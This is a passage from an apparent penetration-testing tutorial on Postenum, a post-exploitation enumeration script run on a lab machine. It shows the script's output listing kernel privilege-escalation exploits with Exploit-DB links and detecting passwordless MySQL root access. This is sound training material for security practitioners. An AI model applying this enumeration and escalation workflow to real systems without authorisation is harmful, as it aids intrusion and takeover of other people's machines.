[x] Possible exploits for linux kernel 2.6.24:
Listing the most popular exploits for kernel 4*
------------------------------------------------------
 Linux Kernel 2.6.39 < 3.2.2 Gentoo / Ubuntu x86-x64 Mempodipper(1) - https://www.exploit-db.com/exploits/18411
 Linux Kernel 2.6.39 < 3.2.2 x86-x64 Mempodipper(2) - https://www.exploit-db.com/exploits/35161
 Linux Kernel 3.7.6 (RedHat x86/x64) - https://www.exploit-db.com/exploits/27297
 Linux Kernel 3.13 < 3.19 Ubuntu 12.04/14.04/14.10/15.04 - https://www.exploit-db.com/exploits/37292
 Linux Kernel 3.13 SGID - https://www.exploit-db.com/exploits/33824
 Linux Kernel 3.13.1 (Metasploit) - https://www.exploit-db.com/exploits/40503
 Linux Kernel 3.14.5 (CentOS 7 / RHEL) - https://www.exploit-db.com/exploits/35370
 Linux Kernel 3.x (Ubuntu 14.04/Mint 17.3/Fedora 22) https://www.exploit-db.com/exploits/41999
 Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - https://www.exploit-db.com/exploits/44298
 Linux kernel < 4.10.15 Race Condition - https://www.exploit-db.com/exploits/43345
 Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - https://www.exploit-db.com/exploits/45010
 Linux Kernel 2.6.22 < 3.9 Dirty Cow - https://www.exploit-db.com/exploits/40839
 Linux Kernel 2.6.22 < 3.9 Dirty Cow (x86-x64) - https://www.exploit-db.com/exploits/40616

The most specific exploits for your kernel 2.6.24
------------------------------------------------------
Nothing extract from exploits, for kernel 2.6.24

First, it gives us the current user and group information. It then shows the distribution name and release number, followed by the kernel version and how the kernel was compiled. Finally, it lists possible exploits with links to their Exploit Database pages. Note that the first list is a fixed set of "most popular" entries (the banner itself says kernel 4*) rather than matches for this target; the kernel-specific list below it is the one to read, and for 2.6.24 it comes back empty.

Finally, there is one last option for Postenum — the ability to run all these options at once. Use the -a switch for this one:

target:/var/tmp$ ./postenum.sh -a

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] OPERATING SYSTEM
[+] - Check current user and group information
[x] The current user and group information:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[x] The current user:
www-data

[+] - Check distribution type and version number
[x] The distribution type and version:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04"

[+] - Check kernel version
[x] Kernel version and (32-bit/64-bit):
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

[x] Kernel version and gcc version used to compile the kernel:
Linux version 2.6.24-16-server (buildd@palmer) (gcc version 4.2.3 (Ubuntu 4.2.3-2ubuntu7)) #1 SMP Thu Apr 10 13:58:00 UTC 2008

[+] - Exploits
[x] Possible exploits for linux kernel 2.6.24:
Listing the most popular exploits for kernel 4*
------------------------------------------------------
 Linux Kernel 2.6.39 < 3.2.2 Gentoo / Ubuntu x86-x64 Mempodipper(1) - https://www.exploit-db.com/exploits/18411
 Linux Kernel 2.6.39 < 3.2.2 x86-x64 Mempodipper(2) - https://www.exploit-db.com/exploits/35161
 Linux Kernel 3.7.6 (RedHat x86/x64) - https://www.exploit-db.com/exploits/27297
 Linux Kernel 3.13 < 3.19 Ubuntu 12.04/14.04/14.10/15.04 - https://www.exploit-db.com/exploits/37292
 Linux Kernel 3.13 SGID - https://www.exploit-db.com/exploits/33824
 Linux Kernel 3.13.1 (Metasploit) - https://www.exploit-db.com/exploits/40503
 Linux Kernel 3.14.5 (CentOS 7 / RHEL) - https://www.exploit-db.com/exploits/35370
 Linux Kernel 3.x (Ubuntu 14.04/Mint 17.3/Fedora 22) https://www.exploit-db.com/exploits/41999
 Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - https://www.exploit-db.com/exploits/44298
 Linux kernel < 4.10.15 Race Condition - https://www.exploit-db.com/exploits/43345
 Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - https://www.exploit-db.com/exploits/45010
 Linux Kernel 2.6.22 < 3.9 Dirty Cow - https://www.exploit-db.com/exploits/40839
 Linux Kernel 2.6.22 < 3.9 Dirty Cow (x86-x64) - https://www.exploit-db.com/exploits/40616

The most specific exploits for your kernel 2.6.24
------------------------------------------------------
Nothing extract from exploits, for kernel 2.6.24

[-] APPS and SERVICES
[+] - Check jobs scheduled
[x] Search on cron in /etc:
drwxr-xr-x  2 root     root     4096 Jul  5  2018 cron.d
drwxr-xr-x  2 root     root     4096 Apr 28  2010 cron.daily
drwxr-xr-x  2 root     root     4096 Mar 16  2010 cron.hourly
drwxr-xr-x  2 root     root     4096 Apr 28  2010 cron.monthly
drwxr-xr-x  2 root     root     4096 Mar 16  2010 cron.weekly
-rw-r--r--  1 root     root      724 Apr  8  2008 crontab

[x] List /etc/cron.d/
-rw-r--r-- 1 root root  507 May  3  2012 php5
-rw-r--r-- 1 root root 1323 Mar 31  2008 postgresql-common

...

[+] - List all available shells
# /etc/shells: valid login shells
/bin/csh
/bin/sh
/usr/bin/es
/usr/bin/ksh
/bin/ksh
/usr/bin/rc
/usr/bin/tcsh
/bin/tcsh
/usr/bin/esh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/screen

[-] TRYING ACCESS
[+] - Check for some methods for extract creds and get access as root
[x] Connect to MYSQL as root and non-pass:
[/] We can connect to the local MYSQL service as 'root' and without a password!
mysqladmin  Ver 8.41 Distrib 5.0.51a, for debian-linux-gnu on i486
Copyright (C) 2000-2006 MySQL AB
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL license

Server version          5.0.51a-3ubuntu5
Protocol version        10
Connection              Localhost via UNIX socket
UNIX socket             /var/run/mysqld/mysqld.sock
Uptime:                 41 min 2 sec

Threads: 2  Questions: 447  Slow queries: 0  Opens: 420  Flush tables: 1  Open tables: 64  Queries per second avg: 0.182

Be aware, this one can take some time since it runs all the options and gathers a lot of information.

Wrapping Up

Today, we learned how to use Postenum, a tool for gathering vital information during the post-exploitation phase. We first compromised the target and transferred the script from our machine. Then, we went over the various options Postenum provides, including gathering network and service information, interesting files, software versions, and other useful data that could ultimately be used for privilege escalation.

Cover image by Vitaly Vlasov/Pexels
